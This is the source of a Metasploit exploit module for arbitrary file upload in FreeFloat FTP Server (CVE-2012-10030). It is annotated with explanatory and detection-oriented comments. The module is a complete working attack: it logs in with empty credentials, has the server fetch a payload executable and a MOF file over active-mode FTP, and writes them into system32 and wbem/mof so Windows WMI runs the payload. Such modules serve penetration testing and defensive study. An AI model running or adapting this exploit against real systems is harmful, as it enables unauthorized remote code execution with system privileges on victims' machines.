GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/freefloatftp_wbem.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
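# Metasploit module for the FreeFloat FTP Server arbitrary file upload
# (CVE-2012-10030, per the References below).
#
# What the code does, in order:
#   1. Logs in to the FTP service with an empty user name and password.
#   2. Uses active-mode FTP (PORT, then STOR) so that the server connects back
#      to the local TcpServer listener and pulls two files from it: an
#      executable and a MOF file.
#   3. Has them stored as WINDOWS/system32/<random>.exe and
#      WINDOWS/system32/wbem/mof/<random>.mof, relative to the FTP root
#      (C:\ according to the module description).
#
# Defensive reading: the three weaknesses named in the description (no real
# authentication, a fixed C:\ root, unrestricted write access) are all
# server-side. Each step above is observable: an FTP login with empty
# USER/PASS values, a PORT command followed by STOR into WINDOWS/system32,
# and new .exe / .mof files under system32 and system32/wbem/mof. The module
# is flagged 'Privileged' => true.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::TcpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Exploit::FileDropper

  # Registers the module metadata and adjusts the option set.
  #
  # @param info [Hash] metadata passed through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "FreeFloat FTP Server Arbitrary File Upload",
        'Description' => %q{
          This module abuses multiple issues in FreeFloat: 1. No credential is actually
          needed to login; 2. User's default path is in C:\, and this cannot be changed;
          3. User can write to anywhere on the server's file system. As a result of these
          poor implementations, a malicious user can just log in and then upload files,
          and let WMI (Management Instrumentation service) to execute the payload uploaded.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sinn3r', # Vulnerability discovery, Metasploit module
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['CVE', '2012-10030'],
          ['OSVDB', '88302'],
          ['OSVDB', '88303']
        ],
        'Platform' => 'win',
        'Targets' => [
          ['FreeFloat', {}]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2012-12-07',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Change the default description so this option makes sense
        OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
      ]
    )

    # The login is always attempted with an empty user name and password,
    # so the credential options are withdrawn.
    deregister_options('FTPUSER', 'FTPPASS') # Using empty user and password
  end

  # Fingerprints the service by its FTP banner.
  #
  # A banner match identifies the product only, not the flaw, so the
  # strongest result returned is Detected.
  #
  # @return [Exploit::CheckCode] Detected when the banner mentions FreeFloat,
  #   Safe otherwise
  def check
    connect
    disconnect

    # `banner` comes from the Ftp mixin (presumably filled in by connect).
    return Exploit::CheckCode::Detected if banner =~ /FreeFloat/

    Exploit::CheckCode::Safe
  end

  # TcpServer callback: runs each time the FTP server opens its active-mode
  # data connection back to the local listener.
  #
  # The first connection receives the executable and advances @stage; the
  # next one receives the MOF. Any other @stage value sends nothing. The
  # connection is closed in every case.
  #
  # @param cli [Object] the accepted client socket
  def on_client_connect(cli)
    # The original also computed an unused "host:port" peer string; dropped.
    case @stage
    when :exe
      print_status("Sending executable (#{@exe.length} bytes)")
      cli.put(@exe)
      @stage = :mof
    when :mof
      print_status("Sending MOF (#{@mof.length} bytes)")
      cli.put(@mof)
    end

    cli.close
  end

  # Opens a dedicated FTP control connection, logs in with empty credentials,
  # and issues PORT + STOR so the server fetches one file from the listener.
  #
  # @param filename [String] remote path given to STOR
  # @return [false, Object] false when the USER or PASS step is rejected;
  #   otherwise the return value of disconnect(conn), which #exploit tests
  #   for truthiness
  def upload(filename)
    # One-second pause via Kernel#select. Presumably this gives the listener
    # started in #exploit time to come up - TODO confirm.
    select(nil, nil, nil, 1)

    print_status("Trying to upload #{::File.basename(filename)}")

    # connect(false, ...) is the Ftp mixin call as written in the original;
    # the returned connection is passed explicitly to every command below.
    conn = connect(false, datastore['VERBOSE'])

    print_status("Sending empty login...")

    user_reply = send_user("", conn)
    unless user_reply && user_reply =~ /331/
      print_error("Error sending username")
      # Close the control connection instead of leaking it on failure.
      disconnect(conn)
      return false
    end

    pass_reply = send_pass("", conn)
    unless pass_reply && pass_reply =~ /230/
      print_error("Error sending password")
      # Close the control connection instead of leaking it on failure.
      disconnect(conn)
      return false
    end

    print_good("Empty authentication was successful")

    # Switch to binary mode
    print_status("Set binary mode")
    send_cmd(['TYPE', 'I'], true, conn)

    # Prepare active mode: pick the listener address and port. A wildcard
    # SRVHOST is replaced by the local source address.
    listen_host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
    listen_port = datastore['SRVPORT'].to_i

    # PORT takes h1,h2,h3,h4,p1,p2 where the port is p1 * 256 + p2.
    host_arg = listen_host.gsub(/\./, ',')
    port_arg = "#{listen_port / 256},#{listen_port.remainder(256)}"

    # Set to active mode
    print_status("Set active mode \"#{host_arg},#{port_arg}\"")
    send_cmd(['PORT', "#{host_arg},#{port_arg}"], true, conn)

    # STOR makes the server pull the file from the listener. The third
    # argument is false here, unlike the TYPE and PORT calls above.
    send_cmd(['STOR', filename], false, conn)

    disconnect(conn)
  end

  # Entry point: prepares the two files, starts a worker thread that drives
  # both uploads, and calls super (the inherited exploit method).
  #
  # File names are random alphabetic strings of 5 to 14 characters, so the
  # directories are a more stable indicator than the names.
  def exploit
    exe_name = "WINDOWS/system32/#{rand_text_alpha(rand(10) + 5)}.exe"
    mof_name = "WINDOWS/system32/wbem/mof/#{rand_text_alpha(rand(10) + 5)}.mof"
    @mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
    @exe = generate_payload_exe
    @stage = :exe

    worker = nil
    begin
      worker = framework.threads.spawn("reqs", false) do
        begin
          # Upload our malicious executable
          exe_sent = upload(exe_name)
          # Upload the mof file
          upload(mof_name) if exe_sent
          # Both paths are registered for cleanup whether or not the uploads
          # succeeded. The MOF is registered under wbem\mof\good rather than
          # the wbem/mof directory it was stored in.
          register_file_for_cleanup(::File.basename(exe_name))
          register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
        rescue ::Exception => e
          # NOTE(review): rescuing ::Exception also traps signals and exit
          # requests; ::StandardError is the narrower choice. Left unchanged
          # so the thread's failure behaviour stays as the author wrote it.
          print_error "Upload Failed: #{e.message}"
          cleanup
        end
      end
      super
    ensure
      # spawn may raise before `worker` is assigned; an unguarded kill would
      # then raise NoMethodError and mask the original error.
      worker.kill if worker
    end
  end
end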